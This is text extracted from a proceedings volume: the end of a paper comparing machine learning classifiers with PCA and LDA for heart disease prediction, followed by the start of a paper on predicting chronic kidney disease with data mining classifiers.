named a hybrid random forest with a linear model (HRFLM). In addition to HRFLM,
they also applied support vector machine, random forest, decision tree, recurrent
fuzzy neural network (RFNN), logistic regression, Naïve Bayes, deep learning and
ensemble methods. Their research was based on the Cleveland heart disease dataset
from the UCI repository having 297 instances with 13 attributes. Their proposed
model HRFLM obtained the highest accuracy of 88.4%, while the voting classifier
and SVM also performed well with 87.41 and 86.1%. The Naïve Bayes algorithm
has the lowest accuracy of 75.8% [6].
Thomas et al. (2016) surveyed different classification algorithms for predicting
the possibility of heart disease of each person based on 13 attributes such as gender,
age, cholesterol, pulse rate, blood pressure. They used various machine learning
techniques such as neural network, KNN, Naïve Bayes and decision tree on a different
number of attributes. They concluded that the accuracy of the algorithms increased
when a greater number of attributes were used [16]. Buettner et al. (2019) worked on
predicting heart disease with random forest classifier on Cleveland dataset having 303
724 K. Dutta et al.

instances with 13 attributes. They trained the model with tenfold cross-validation and
also without it. They found that four various categories of chest pain type (atypical
anginal, asymptomatic, nonanginal and typical anginal), heart disease status and
major vessel number were very important for heart disease classification. The model
achieved an accuracy of 84.448% with cross-validation and 82.895% without cross-
validation [17]. Banu et al. (2014) discussed Clustering such as k-Means Clustering,
Association Rule Learning like Maximal Frequent Itemset Algorithm (MAFIA) and
classification techniques like decision tree, Naïve Bayes, neural network and C4.5
algorithm for exploring heart disease. They found that K-mean-based MAFIA with
ID3 and C4.5 was the best model with an accuracy of 89% [18]. Waghulde et al. (2014)
demonstrated the genetic neural network technique for heart disease prediction using
Cleveland dataset and thus obtained 98% accuracy [19].

3 Materials and Methodology

Machine learning or data mining has become one of the advanced technologies for
the health care sector [20, 21]. With help of machine learning or deep learning, many
diseases can be predicted in real time and the entire health industry can be benefitted
from it. This paper deals with predicting whether a person has heart or cardiovascular
disease or not. Data classification algorithms like artificial neural network (ANN),
decision tree, random forest, KNN, SVM, logistic regression and ensemble methods
were applied for detecting whether a person has a heart problem or not and has been
discussed Fig. 1.
ANN is a computational or mathematical model inspired by the human nervous
system [22]. ANN has the unique feature of establishing a relationship between
dependent and independent variables and pulls out vital information and complex
knowledge from datasets. ANN consists of output and input layer nodes, which

Fig. 1 Workflow of heart


disease prediction
Early-Stage Coronary Ailment Prediction Using Dimensionality … 725

are connected by hidden nodes, and weights are assigned to each node. Hidden
layer nodes fire activation functions to pass information to the input nodes [23].
Logistic regression is mainly used to predict the results of the input to a selected set
of classes. The logistic sigmoid function is generally used to transform the output
in classification [24]. A linear equation is taken as an input in logistic regression,
and then, the sigmoid function undergoes the tasks of binary classification. KNN
is a non-parametric algorithm, in which the number of neighbors (k) is chosen.
Generally, the Euclidean distance method for the calculation process is used for
the identification. After calculating, the distance sorting must be done in increasing
order on the basis of distance. Then, the most frequent class of the rows is taken to
return the predicted values [25]. To maximize the predictive accuracy, there are two
parts of the support vector machine, i.e., SRM and ERM. SRM decreases an upper
limit on the expected chance, whereas ERM decreases the error on training data. In
the SVM algorithm, every data is plotted as a point in n-dimensional space. Then,
the classification gets proceeded by searching the hyper-plane, which reduces the
similarities between the two classes. SVM does not perform well on noisy dataset
[26]. A collection of algorithms based on Bayes’ theorem together form Naïve Bayes
classifier. This algorithm comprises a set of algorithms where a common principle
is shared that is every pair of features that are being classified is independent of
each other. Decision tree Classifier [27] is like an if-else condition. The condition
is applied to the tree which then leads to either an internal node or to a leaf node.
This algorithm mainly works recursively that choose the best diving criteria for the
dataset to build the tree. One main advantage of the decision tree algorithm is that
compared to other algorithms decision tree requires less effort for the preparation
during the pre-processing. The noisy dataset and overfitting are checked by pruning
trees. Random forest Classifier [28] creates a set of decision trees that collects the
votes from randomly chosen sub-group of the training set to determine the class of the
test object. Random forest classifier includes extra randomness in the model while
creating the tree. Despite looking for an important attribute in the process of splitting,
it selects the best attribute within a random set. One of the main disadvantages of
a random forest classifier is that it has a tendency to overfit, so the tuning of the
hyperparameters is necessary. One of the incremental learning algorithms is the
Passive Aggressive algorithm. The main formula of this classifier is that it adjusts
its weight vector against every misclassified training samples. Passive Aggressive
Classifier comprises of two words, “passive” which explains that if the prediction is
correct, no changes are needed to make in the model but “aggressive” depicts that if
the prediction is not correct, some changes are required which may correct the model
[29]. Ada boosting algorithm is an ensemble technique meta-algorithm. The main aim
of this algorithm is that it works as a strong classifier for many weak classifiers. For a
binary classification problem, Ada Boost is considered as the first successful boosting
algorithm. In the parallel ensemble method, a base learner is created in parallel
and sequential, learners are generated sequentially [30]. AdaBoost machine learning
model is then iteratively trained through the selection of the training set on the basis
of accuracy. Selection of the higher weight is done with comparison to classified
results so that the probability gets more in the next interactions. Simultaneously, it
726 K. Dutta et al.

puts the weight on the classifier which is trained at first at each iteration depending
on the accuracies of the classifiers. The process gets iterated till the whole training
data fits without any fault [31]. One of the interesting ensemble solutions which are
considered as a stacking subset is offered by a voting classifier which is evaluated in
parallel to exploit various peculiarities of the algorithm. Two different strategies are
followed, i.e., hard voting in which class has received the highest number of votes
that must be chosen and soft voting where for all the classifiers, and the probability
vectors for each of the predicted classes are summed [32].

3.1 Data Exploration

Exploring the dataset is one of the important parts of machine learning algorithms as
it helps us to study the statistics and class of the data. The dataset has been collected
from Kaggle [33] in csv format which includes 303 patient records with 13 attributes
and 1 target variable. The dataset was divided into two parts, i.e., 30% for testing
and 70% for training. Figure 2 shows the correlation graph of the dataset.

Fig. 2 Correlation graph of


the dataset attributes

3.2 Feature Selection

Data mining or machine learning algorithms have a very important part in selecting
the minimum number of attributes for training the model, so that computation cost
is decreased and also for improving the performance of the algorithm [34, 35]. This
paper uses two dimensionality reduction techniques like LDA and PCA.
Early-Stage Coronary Ailment Prediction Using Dimensionality … 727

A multivariate technology that examines the dataset in which observations are


reported by many inter-correlated numerical dependent attributes. PCA, a popularly
used linear transformation algorithm, is an unsupervised technique of extracting
vital information from the dataset and represent it as novel orthogonal attributes.
Cross-validation technique like jackknife and bootstrap is used for checking the
standard of PCA [36]. Due to the decreased requirement for memory and capacity,
low noise sensitivity and enhanced efficiency are the advantages of the PCA. PCA has
been generalized for handling qualitative variables and heterogeneous variables by
correspondence analysis (CA) and multifactor analysis (MFA), respectively, [37].
The performance of Linear Discriminant Analysis can be evaluated on randomly
generated data and it also handles the instances whose class frequencies are uneven.
LDA does dataset classification, whereas PCA is for feature classification. LDA
provides more classes and draws a decision region among the classes rather than
changing the location, which helps in understanding the data feature [38].

4 Result

The performance of the different classifiers needs to be evaluated for noticing the
correctness and execution of the test dataset and selecting the prime model. The
performance of the algorithms can be described by evaluating different metrics like
precision, recall, F 1 -score, AUC Score, accuracy and balanced accuracy (BAC),
obtained from confusion metrics having four outcomes. Table 1 shows the confusion
matrix of all the classifiers used in the paper. Tables 2 and 3 show the performance
of various metrics for LDA and PCA, respectively. The performance of the different
models concerning the evaluating metrics has been shown graphically in Figs. 3 and
4.

Table 1 Confusion matrix of the algorithms


Algorithms PCA LDA
TP TN FP FN TP TN FP FN
ANN 24 30 3 4 22 30 5 4
Logistic R 22 31 5 3 21 30 6 4
KNN 19 21 8 13 23 27 4 7
SVC 22 31 5 3 20 31 7 3
Naïve Bayes 22 27 5 7 20 31 7 3
Decision tree 24 25 3 9 20 27 7 7
Random forest 24 25 3 9 20 27 7 7
Passive aggressive 21 29 6 5 3 34 24 0
Ada boost 20 29 7 5 24 27 3 7
Voting classifier 22 31 5 3 21 30 6 4
728 K. Dutta et al.

The different evaluating metrics can be calculated with the help of the confu-
sion matrix [39, 40]. The mathematical equations for the various metrics have been
discussed in Eqs. 1–4.

Tp + Tn
Accuracy = (1)
Tp + Tn + Fp + Fn
Tp
Precision = (2)
Tp + Fp
Tp
Recall = (3)
Tp + Fn
(P*R)
F1 score = 2* (4)
(P + R)

where Tp is the true positive, Tn refers to true negative, Fp is the false positive, Fn
means false negative, P refers to precision and R is the recall.

SP − PE(NO + 1)/2
AUC = (5)
PE ∗ NO
where NO is the negative observations, PE is the positive examples and SP refers
to sum of positive observations.
Table 3 shows the results of the different algorithms trained with Principal Compo-
nent Analysis (PCA). It has been observed that the artificial neural network (ANN)
performed well on the dataset with 88.52% accuracy, 88.56% recall, 88.31% preci-
sion and 88.41% F 1 -score. Logistic regression, SVC and voting classifier also
performed better with 86.89% accuracy, 86.33% recall, 87.06% precision and 86.59%

Table 2 Performance measure of different algorithms for LDA


Algorithms Accuracy Recall Precision F 1 -score ROC
ANN 85.24 84.61 81.48 83.01 83.56
Logistic R 83.61 83.01 83.67 83.24 83.01
KNN 81.97 82.30 81.88 81.89 82.30
SVC 83.61 82.63 84.27 83.06 82.63
N bayes 83.61 82.63 84.27 83.06 82.63
D free 77.05 76.74 76.74 76.74 76.74
R forest 77.05 76.74 76.74 76.74 76.74
Passive A 60.66 55.56 79.31 46.96 55.56
Ada boost 83.61 84.15 83.71 83.57 84.15
VC 83.61 83.01 83.67 83.24 83.01
Early-Stage Coronary Ailment Prediction Using Dimensionality … 729

Table 3 Performance measure of different algorithms for PCA


Algorithms Accuracy Recall Precision F 1 -Score ROC
ANN 88.52 88.56 88.31 88.41 88.56
Logistic R 86.89 86.33 87.06 86.59 86.33
KNN 65.57 66.07 65.89 65.54 66.07
SVC 86.89 86.33 87.06 86.59 86.33
N bayes 80.33 80.45 80.12 80.19 80.45
D tree 80.33 81.21 81.01 80.32 81.21
R forest 80.33 81.21 81.01 80.32 81.21
Passive A 81.97 81.54 81.81 81.65 81.54
Ada boost 80.33 79.68 80.28 79.89 79.68
VC 86.89 86.33 87.06 86.59 86.33

Fig. 3 Performance graph of algorithms for LDA

F 1 -score. K-Nearest Neighbors did not perform well as it achieved 65.57% accu-
racy, 66.07% recall, 65.89% precision and 65.54% F 1 -score. Table 4 shows the results
of the different algorithms trained with LDA. It has been observed that the artificial
neural network (ANN) performed well on the dataset with 85.24% accuracy, 84.61%
recall, 81.48% precision and 83.01% F 1 -score. Logistic regression, SVC and voting
classifier also performed better with 83.61% accuracy, 83.01% recall, 83.67% preci-
sion and 83.24% F 1 -score. Passive Aggressive Classifier did not perform well as it
achieved 60.66% accuracy, 55.56% recall, 46.96% F-1score and 79.31% precision.
730 K. Dutta et al.

Fig. 4 Performance graph of algorithms for PCA

Table 4 Comparative analysis of the paper


Authors Year Methodology Result
Rajkumar and Reena [13] 2010 KNN, Naïve Bayes and Naïve Bayes was the best
decision list algorithms with 52.33%
Kangwanarikul et al. [14] 2010 SVM, BNN, BPNN They found that BNN and
BPNN were the best
algorithms with 78.43%
accuracy
Princy and Thomas [16] 2016 Neural network, KNN, They analyzed the algorithms
Naïve Bayes and decision with the different number of
tree attributes and attained the
highest accuracy of 80.6%
Nayak et al. [15] 2019 SVM, Naïve Bayes, KNN Naïve Bayes performed
really excellent with 88.67%
accuracy
Mohan et al. [6] 2019 HRFLM, RFNN, SVM, HFRLM was the best model
Naïve Bayes with 88.4% accuracy
Buettner and Schunter [17] 2019 They trained random forest The model achieved
classifier with and without 84.448% accuracy with
cross-validation cross-validation and 82.895%
without cross-validation

5 Conclusion and Future Work

Data mining in the healthcare industry is unlike the other sector, as the datasets
available are heterogeneous and certain social, legal and ethical restrictions apply to
Early-Stage Coronary Ailment Prediction Using Dimensionality … 731

medical information. The primary motivation of the paper is to furnish more insight
into cardiovascular disease prediction as it is very important and challenging in the
healthcare organization. If the heart disease is detected at an early stage and the
medications were done, then the mortality rate can be controlled drastically. Various
machine learning and deep learning algorithms such as ANN, random forest, deci-
sion tree, Ada Boost, Naïve Bayes, KNN, SVM, voting classifier, logistic regression
and Passive Aggressive have been trained with PCA and LDA dimensionality reduc-
tion techniques for efficacious and efficient heart disease diagnosis. The study also
makes use of LDA and PCA for dimensionality reduction. The best algorithm was
artificial neural network, which achieved 88.52% accuracy when trained with PCA
and 85.24% accuracy when trained with LDA.
In the future, the research can be performed with many data mining algorithms for
predicting the disease more accurately and efficiently. The dataset can be enlarged
for better prediction. Need to explore various rules such as Clustering, K-means for
ease of simplicity and better efficiency.

References

1. Bhatla, N., & Jyoti, K. (2012). An analysis of heart disease prediction using different data
mining techniques. International Journal Engineering Research and Technology, 1(8), 1–4.
2. Palaniappan, S., & Awang, R. (2008). Intelligent heart disease prediction system using data
mining techniques. AICCSA 08—6th IEEE/ACS international conference on computer systems
and applications (pp. 108–115). doi: https://doi.org/10.1109/AICCSA.2008.4493524.
3. Jalali, S. M. J., Karimi, M., Khosravi, A., & Nahavandi, S. (2019). An efficient neuroevolution
approach for heart disease detection. In 2019 IEEE international conference on Systems, Man
and Cybernetics (SMC), (vol. 77, no. 1, pp. 3771–3776). doi: https://doi.org/10.1109/SMC.
2019.8913997.
4. Alzubi, J. A., Kumar, A., Alzubi, O. A., & Manikandan, R. (2019). Efficient approaches for
prediction of brain tumor using machine learning techniques. Indian Journal of Public Health
Research & Development, 10(2), 267. https://doi.org/10.5958/0976-5506.2019.00298.5
5. Das, S., Sharma, R., Gourisaria, M. K., Rautaray, S. S., & Pandey, M. (2020). Heart disease
detection using core machine learning and deep learning techniques: A comparative study.
International Journal on Emerging Technologies, 11(3), 531–538.
6. Mohan, S., Thirumalai, C., & Srivastava, G. (2019). Effective heart disease prediction using
hybrid machine learning techniques. IEEE Access, 7, 81542–81554. https://doi.org/10.1109/
ACCESS.2019.2923707
7. Dangare, C. S., & Apte, S. S. (2012). Improved study of heart disease prediction system using
data mining classification techniques. International Journal of Computers and Applications,
47(10), 44–48. https://doi.org/10.5120/7228-0076
8. Ramalingam, V. V., Dandapath, A., Karthik Raja, M. (2018). Heart disease prediction using
machine learning techniques: A survey. International Journal of Engineering and Technology,
7(2.8), 684–687. doi: https://doi.org/10.14419/ijet.v7i2.8.10557.
9. Nayak, S., Gourisaria, M. K., Pandey, M., & Rautaray, S. S. (2020). Comparative analysis of
heart disease classification algorithms using big data analytical tool. 582–588.
10. Jee, G., Harshvardhan, G., & Gourisaria, M. K. (2021). Juxtaposing inference capabilities of
deep neural models over posteroanterior chest radiographs facilitating COVID-19 detection.
Journal of Interdisciplinary Mathematics 1–27. doi: https://doi.org/10.1080/09720502.2020.
1838061.
732 K. Dutta et al.

11. Atallah, R., & Al-Mousa, A. (2019). Heart disease detection using machine learning majority
voting ensemble method. In 2019 2nd International Conference on new Trends in Computing
Sciences (ICTCS) (pp 1–6). doi: https://doi.org/10.1109/ICTCS.2019.8923053.
12. Nayak, S., Kumar Gourisaria, M., Pandey, M., & Swarup Rautaray, S. (2019). Heart disease
prediction using frequent item set mining and classification technique. International Journal
of Information Engineering and Electronic Business, 11(6), 9–15. doi: https://doi.org/10.5815/
ijieeb.2019.06.02.
13. Rajkumar, A., & Reena, G. S. (2010). Diagnosis of heart disease using datamining algorithm.
Global Jounal Computer Science and Technology, 10(10), 38–43.
14. Kangwanariyakul, Y., Nantasenamat, C., Tantimongcolwat, T., & Naenna, T. (2010). Data
mining of magnetocardiograms for prediction of ischemic heart disease. EXCLI Journal, 9,
82–95. doi: https://doi.org/10.17877/DE290R-15805.
15. Nayak, S., Gourisaria, M. K., Pandey, M., & Rautaray, S. S. (2019). Prediction of heart disease
by mining frequent items and classification techniques. In 2019 International conference on
Intelligent Computing and Control Systems (ICCS) (pp. 607–611). doi: https://doi.org/10.1109/
ICCS45141.2019.9065805.
16. Princy, R. T., & Thomas, J. (2017). Human heart disease prediction system using data mining
techniques. In Proceedings of the IEEE International Conference on Circuit, Power and
Computing Technologies (ICCPCT) 2017.
17. Buettner, R., & Schunter, M. (2019). Efficient machine learning based detection of heart
disease. 2019 IEEE international conference on E-health networking, application & services
(HealthCom) 2019. doi: https://doi.org/10.1109/HealthCom46333.2019.9009429.
18. Nishara Banu, M. A., & Gomathy, B. (2014). Disease forecasting system using data mining
methods. In International Conference on Intelligent Computing Applications (ICICA) 2014
(pp. 130–133). doi: https://doi.org/10.1109/ICICA.2014.36.
19. Waghulde, N. P., & Patil, N. P. (2014). Genetic neural approach for heart disease prediction.
International Journal of Advanced Computer Research, 4(3), 778–784.
20. Dey, S., Gourisaria, M. K., Rautray, S. S., & Pandey, M. (2021). Segmentation of Nuclei in
microscopy images across varied experimental systems. 87–95.
21. Rautaray, S. S., Dey, S., Pandey, M., & Gourisaria, M. K. (2020). Nuclei segmentation in
cell images using fully convolutional neural networks. International Journal on Emerging and
Technology, 11(3), 731–737.
22. Abraham, A. (2005). Artificial neural networks. In Handbook of Measuring System Design.
Wiley.
23. Sharma, S., Gourisaria, M. K., Rautray, S. S., Pandey, M., & Patra, S. S. (2020). ECG classi-
fication using deep convolutional neural networks and data analysis. International Journal of
Advanced Trends in Computer Science and Engineering, 9, 5788–5795.
24. Tsangaratos, P., & Ilia, I. (2016). Comparison of a logistic regression and Naïve Bayes classifier
in landslide susceptibility assessments: The influence of models complexity and training dataset
size. CATENA, 145, 164–179. https://doi.org/10.1016/j.catena.2016.06.004
25. Alzubi, O., Alzubi, J., Tedmori, S., Rashaideh, H., & Almomani, O. (2018). Consensus-based
combining method for classifier ensembles. The International Arab Journal of Information
Technology, 15(1), 76–86.
26. Mavroforakis, M. E., & Theodoridis, S. (2006). A geometric approach to Support Vector
Machine (SVM) classification. IEEE Transactions on Neural Networks, 17(3), 671–682. https://
doi.org/10.1109/TNN.2006.873281
27. Swain, P. H., & Hauska, H. (1977). The decision tree classifier: Design and potential. IEEE
Transactions on Geoscience Electronics, 15(3), 142–147. https://doi.org/10.1109/TGE.1977.
6498972
28. Azar, A. T., Elshazly, H. I., Hassanien, A. E., & Elkorany, A. M. (2014). A random forest
classifier for lymph diseases. Computer Methods and Programs in Biomedicine, 113(2), 465–
473. https://doi.org/10.1016/j.cmpb.2013.11.004
29. Hosseinzadeh, H., Razzazi, F., & Haghbin, A. (2015). A self training approach to auto-
matic modulation classification based on semi-supervised online passive aggressive algorithm.
Early-Stage Coronary Ailment Prediction Using Dimensionality … 733

Wireless Personal Communications, 82(3), 1303–1319. https://doi.org/10.1007/s11277-015-


2284-7
30. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications, 32(20), 16091–16107. https://doi.org/10.1007/
s00521-020-04761-6
31. An, T.-K., & Kim, M.-H. (2010). A new diverse AdaBoost classifier. In 2010 International
conference on artificial intelligence and computational intelligence (pp. 359–363). doi: https://
doi.org/10.1109/AICI.2010.82.
32. Saqlain, M., Jargalsaikhan, B., & Lee, J. Y. (2019). A voting ensemble classifier for wafer
map defect patterns identification in semiconductor manufacturing. IEEE Transactions on
Semiconductor Manufacturing, 32(2), 171–182. https://doi.org/10.1109/TSM.2019.2904306
33. Ronit, “Kaggle Dataset.” https://www.kaggle.com/ronitf/heart-disease-uci.
34. Alweshah, M., Alzubi, O. A., & Alzubi, J. A. (2016). Solving attribute reduction problem
using wrapper genetic programming. IJCSNS International Journal of Computer Science and
Network Security, 16(5), 77–84.
35. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & de Albuquerque,
V. H. C. (2020). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computing and Applications, 32(15), 10915–10925. https://doi.org/10.1007/
s00521-018-3688-6
36. Abdi, H., & Williams, L. J. (2010). Principal component analysis. Wiley Interdisciplinary
Reviews: Computational Statistics, 2(4), 433–459. https://doi.org/10.1002/wics.101
37. Karamizadeh, S., Abdullah, S. M., Manaf, A. A., Zamani, M., & Hooman, A. (2013). An
overview of principal component analysis. Journal of Signal and Information Processing,
04(03), 173–175. https://doi.org/10.4236/jsip.2013.43b031
38. Xanthopoulos, P., Pardalos, P. M., & Trafalis, T. B. (2013). Linear discriminant analysis.
Mikrobiyoloji Bulteni, 38(4), 27–33.
39. Gourisaria, M. K., Das, S., Sharma, R., Rautaray, S. S., & Pandey, M. (2020). A deep learning
model for malaria disease detection and analysis using deep convolutional neural networks.
International Journal on Emerging Technologies, 11(2), 699–704.
40. Sharma, R., Das, S., Gourisaria, M. K., Rautaray, S. S., & Pandey, M. (2020). A model for
prediction of paddy crop disease using CNN. pp. 533–543.
Inferring the Occurrence of Chronic
Kidney Failure: A Data Mining Solution

Rwittika Pramanik , Sandali Khare ,


and Mahendra Kumar Gourisaria

Abstract Kidney is a vital and essential organ as it helps to get rid of waste and
subsidiary fluids from our body. Our kidneys do away with acids that are secreted
cells present in our body, and thus, a stability of salts, water and minerals such as
Potassium, Sodium, Calcium and Phosphorus in our blood is maintained. Kidneys
also produce hormones that keep our blood pressure in control, make red blood
cells, and keep our bones robust and resilient. Hence taking care and maintaining the
proper health of our kidney are of utmost importance and significance. Prediction
and identification of kidney diseases at the primitive stage will give us an advantage
and persuade us to take further required medical treatments. The dataset imported has
been preprocessed by removing all the redundant features and contrasting data mining
classification methods like decision tree classification, RF, SVM classification, Naïve
Bayes and k-NN classification are implemented in this paper for discernment and
screening of the diseases. The accuracy of the prediction produced by each of the
classification techniques has been compared and exhibited in different performance
metrics such as specificity, sensitivity, negative predictive value, positive predictive
value and accuracy. It has been computed that random forest classifier achieved the
highest accuracy of 98.81% surpassing all the other classification techniques.

Keywords Machine learning · Health care · Chronic kidney disease ·


Classification · Data mining · Random forest · Naïve Bayes

1 Introduction

Health care is the nurture and health refinement through avoidance, detection, therapy,
recuperation and the healing of diseases. It is a part of life and without genuine and
proper healthcare the population is far more at risk and peril. But the major altercation
is to supply advanced care and services of medicinal at an inexpensive monetary
value. However, diseases being diagnosed in the elementary stage will spare the

R. Pramanik · S. Khare · M. K. Gourisaria (B)


School of Computer Engineering, KIIT Deemed To Be University, Bhubaneswar, Odisha 751024,
India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 735
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_59
736 R. Pramanik et al.

victim from the cost of complicated treatments, and thus, the expenditure is expected
to cease significantly. Chronic kidney disease (CKD) is the form of disorder when
the kidneys are blemished, loses its ability to filter the blood properly and causes
the wastes to pile up in the body. The disorder is termed as ‘chronic’ because the
kidneys are damaged steadily over a period of time. The most challenging task is the
abstraction of an enormous amount of input for supervising the patient’s information
and statistics of health care. So the required filtration of data is applied and different
data mining classification approaches such as random forest, decision tree classifier,
SVM, KNN and Naive Bayes classifier are exercised to locate and intercept the
diseases [1]. The data employed here was recorded in India for a period of two
months with the number of features of 25, example blood pressure, sugar and many
more.
The various parts into which this research paper is segmented are as mentioned.
Outline of the chronic kidney disorder is present in Sect. 2. Section 3 supplies an
account relating to literature survey of kidney disorders. The flowchart of working is
chronicled in Sect. 4. An abridged analysis of the classification techniques such as
SVM, decision tree, RF, Naive Bayes and KNN is done in Sect. 6. Section 7 is about
the analysis of result of various models used for prediction. The inference, a quick
survey of the document and future work that can be done based on this research, is
provided in Sect. 8.

2 Chronic Kidney Disease

Chronic kidney disease is a deep-rooted condition where the kidneys fail to work
properly and perform its basic functions. The risk of getting vulnerable to this disease
increases with age. However, anyone can get affected by it, but it is more regular
to people who are black or hailing from countries of South Asia. There are several
factors which increases the risk of CKD which is mentioned in Fig. 1.

Fig. 1 Causes of chronic kidney disease

Prediction of CKD will help to initiate the required treatment from an elementary
stage and thus reduce both the expenditure and risk of further complicated treatment
procedure. There are total 5 stages [2] of CKD namely:
Stage 1: mild kidney damage, protein in urine.
Stage 2: fatigue, low appetite, weakness.
Inferring the Occurrence of Chronic Kidney Failure … 737

Stage 3: anaemia (low RBC count), high blood pressure, bone disease.
Stage 4: nausea and vomiting, complete loss of appetite.
Stage 5: Risk of heart disease and stroke, kidney failure.
In 2011, 63,538 CKD cases has been registered by the CKD Registry of India and
the numbers are growing significantly each year [3]. And an approximate of 10% of
the international population has the condition of chronic kidney disease (CKD), and
every year millions expires due to the shortage of inexpensive treatment. As per the
global burden of disease study made in 2010, CKD got the position of 27th in the
catalogue of reasons of global death in 1990, and in 2010 the rank was increased to
18th. Only HIV and AIDS have this kind of proportion of levelling up in the rank
table [4].

3 Literature Survey

Aljaaf et al. studied and predicted the diagnosis of chronic kidney disorder at an
elementary stage and a total of 4 classification techniques of machine learning has
been used to picture the outcome [5]. Almansour et al. used SVM and ANN for the
detection of CKD or chronic kidney disorder. A dataset comprising of 400 samples
and 24 features has been employed for the same [6]. Xiao et al. predicted the seri-
ousness of the chronic kidney disorder. The number of machine learning models
exercised for the diagnosis is 9 including ridge regression, logistic regression and
random forest. With AUC 0.873, the best accuracy was given by logistic regression
[7]. Charleonnan et al. inspected four techniques of machine learning comprising
LR, KNN, SVM and decision tree and the presence of chronic kidney disease is
predicted [8]. Saha et al. predicted the presence of CKD using various ML classifica-
tion methods as logistic regression, Naïve Bayes, multilayer perceptron, Adam-DNN
and random forest. The highest accuracy of 97.35% is achieved by Adam-DNN [9].
Sinha et al. compared the measure of performance based on precision, execution time
and accuracy of KNN and support vector machine in the prediction of chronic kidney
disorder. It has been observed that the accuracy of SVM is less than that of K nearest
neighbour [10]. Qin et al. have explored six classification methods including Naïve
Bayes, SVM, feed forward neural network, random forest and KNN out of which
random forest has ranked first with the highest accuracy of 99.75% [11]. Almasoud
et al. performed different tests like ANOVA test, Cramer’s V test and Pearson’s corre-
lation to deduct all the unnecessary features in the dataset and after training various
algorithms such as gradient boosting, logistic regression, random forest and SVM,
99.1% accuracy has been achieved [12]. Rubini et al. used three classifiers namely
logistic regression, radial basis function and multilayer perceptron and put forward
a new dataset of chronic kidney disease. The outcome of the experiment is shown in
terms of accuracy, sensitivity, f -score, specificity and type I and II error. The harmony
between the expert classification and the classifier is measured by the Kappa Value
738 R. Pramanik et al.

[13]. Devika et al. performed classification using several machine learning classifi-
cation models like random forest, K-Nearest neighbour and Naïve Bayes for chronic
kidney disease diagnosis and the performance is measured based on execution time,
accuracy and preciseness. The outcome predicted by random forest is found to be
better than the other two classification algorithm used in the experiment [14].

4 Proposed Model

The main aim of the models are to predict if a patient is suffering from CKD or
not based on various features that has been provided in the data set. The complete
workflow of which has been illustrated in Fig. 2. First, the raw data has been imported
and pre-processing techniques such as removal of outliers, converting object type to
numerical type and imputing missing values has been performed. The attributes are
filtered and the necessary features are passed onto the classification model so that
a better accuracy is achieved [15]. The classification algorithm used in this case is
namely LR, SVM, Naïve Bayes, KNN, decision tree and RF. In machine learning, we
come across a vast range of metrics that are used to measure the performance of the
models. However in this approach, the performance metrics of sensitivity, specificity,
PPV, NPV and accuracy have been employed.

Fig. 2 Flow of work for diagnosis of CKD

5 Data Exploration and Filtration

On analyzing the dataset, a total number of numerical and categorical variables are
found to be 12 and 13, respectively [16]. However, on observing the type of few
numerical variables they are found to be of object type and the reason being the
presence of garbage characters. Hence the same variables are converted to numerical
type after replacing the garbage characters with NAN value. The total number of
Inferring the Occurrence of Chronic Kidney Failure … 739

missing values of each columns are computed and it has been found that there are a
huge set of data with missing values, highest being RBC with total of 107 missing
data. As the number of sample in this dataset is considerably small, so deleting
every rows comprising of missing values will not be efficient so the missing values
of numerical columns and categorical columns are imputed [17] with median and
mode, respectively. Next, the number of outliers of each data column is examined
using z-score analysis and almost all the attributes have outliers which has then been
imputed with median [18].
For dimensionality reduction all the non-numerical categorical attributes are
converted to numeric using binary values [19]. Correlation between the attributes are
displayed using the heatmap which is displayed in Fig. 3 and attributes are dropped
by taking more than 0.6 as absolute co-efficient [20].

Fig. 3 Correlation heatmap


740 R. Pramanik et al.

6 Classification Methods

6.1 Decision Tree

A decision tree is formed by answering to question sequences according to the dataset


record. It basically consists of nodes of three types. They are leaf nodes, root node
and internal nodes as shown in Fig. 4. The root node has edges that go outside and
no edges that come to it [21]. Internal nodes have more than one outgoing edges and
one edge coming to it. Leaf nodes have one edge coming to it and no edges going out
from it. A class is allocated to each leaf node [22]. The benefits and the downsides
of this technique are listed in Table 1.

Fig. 4 Overview of decision


tree Root
node

Split Point
Internal Internal
node node

Leaf node Leaf node Leaf node Leaf node

Table 1 Pros and cons of


Pros Cons
decision tree
Numerical as well as Only categorical output is
categorical data can be produced
processed
Can be deciphered easily It is not stable
Computation required is less Overfitting
High dimension of data is Requires pruning
not a problem

6.2 Logistic Regression

This technique is one of the most used methods for classification problems that are
binary with many benefits and drawbacks which are listed in Table 2. The logistic
function which is used in this technique is the basis for the name of logistic regression.
Statisticians developed the sigmoid function or the logistic function to express the
features of growth in population. It is basically a curve of S shaped that can take any
Inferring the Occurrence of Chronic Kidney Failure … 741

real valued input and then scale it between the ranges of 0–1. Logistic regression
can be further classified into different types such as ordinal LR, multinomial LR and
binary LR [23]. The logistic function which forms the basis of logistic regression is
depicted by the equation

1
σ (z) = p = (1)
1 + e−z

Table 2 Pros and cons of logistic regression


Pros Cons
No overfitting Linear boundaries are constructed
Can be trained quickly Not ideal when features are more than observations
For simple data sets accuracy is good Linearity is assumed
Implementation is easy Discrete functions can only be predicted

6.3 Naïve Bayes

A Bayes Theorem based algorithm, this technique is used to find the solution of
classification problems. Naïve Bayes classifier builds machine learning models that
are very fast and produce predictions quickly. It is one of the most fruitful and easy
algorithms, but has downsides too, all of which are stated in Table 3. The Bayes
Theorem formula is computed as

P(B|A)P(A)
P(A|B) = (2)
P(B)

Table 3 Pros and cons of Naïve Bayes


Pros Cons
Easily implemented It cannot model dependencies amongst
variables
Estimation of parameters can be done even if Problem due to vanishing values
training data is small
Accuracy is good Overhead in case of smoothing
High dimension of data is not a problem Independence of class conditional
742 R. Pramanik et al.

6.4 Support Vector Machine

Employed for both classification and regression, this is one of the most commonly
used algorithm that supervises and predicts the required outcome. The main objective
of this supervised learning algorithm is to produce a decision boundary which is called
hyperplane [24], and it divides space of n-dimensional into classes just so every time
a new input is given it is assigned to the right category. Table 4 lists the benefits and
downsides of this machine learning technique.

Table 4 Pros and cons of SVM


Pros Cons
Spaces with high dimensions is fruitful Noise in data set reduces accuracy
